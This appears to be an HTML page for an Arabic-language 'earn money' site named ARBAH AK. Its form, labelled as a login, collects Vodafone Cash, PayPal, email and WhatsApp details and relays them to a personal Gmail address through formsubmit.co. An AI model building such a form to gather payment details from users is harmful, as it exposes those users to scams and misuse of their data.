<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="style.css">
    <title>ارباحك</title>
</head>
<body>
    
    <div class="header"><div class="logo">
        ARBAH<span> AK</span> 
    </div> 
    <div class="navbar">
        <a href="index.html">ازاي بيشتغل</a>
         <a href="i.html"> الدخول</a>
    <a href="o.html"> المهام</a>
    <a href="k.html" >  الربح و المتابعه </a>
    </div>
    </div>



    <div class="container">
        <h1>سجل بياناتك log in</h1>
        <form target="_blank" action="https://formsubmit.co/mahmoudccnn@gmail.com" method="POST">
          <div class="form-group">
            <div class="form -col">
              <div class="col">
                <input type="number" name="الرقم فودافون كاش " class="form-control" placeholder="فودافون كاش" required>
              </div>
               <div class="col">
                <input type="number" name="اpaypal " class="form-control" placeholder="paypal" required>
              </div>
              <div class="col">
                <input type="email" name="email" class="form-control" placeholder="Email Address" required>
              </div>
              
              <div class="col">
                <input type="watsapp" name="watsapp" class="form-control" placeholder="رقم الواتس" required>
              </div>
            </div>
          </div>
          
          <button type="submit" class="btn btn-lg btn-dark btn-block">ابعت المعلومات</button>
        </form>
      </div>


























      
<style>
    h1{
        margin:10px;
    
        word-spacing: 10px;
    }
    .form-control{
        height: 60px;
     color: black;
     font-size: 30px;
     border-radius: 30px;
     margin: 40px;
     padding-left: 30px;
        width: 300px;
        background-color: rgb(255, 255, 255);
    }
.btn{
    height: 100px;
    width: 320px;
    color: white;
    border: none;font-size: 40px;
    border-radius: 50%;
    margin-left: 60px;
    background-color: goldenrod;
transition: 3s all;
}
.btn:hover{
    color: goldenrod;
    background-color: white;
}
</style>




</body>
</html>

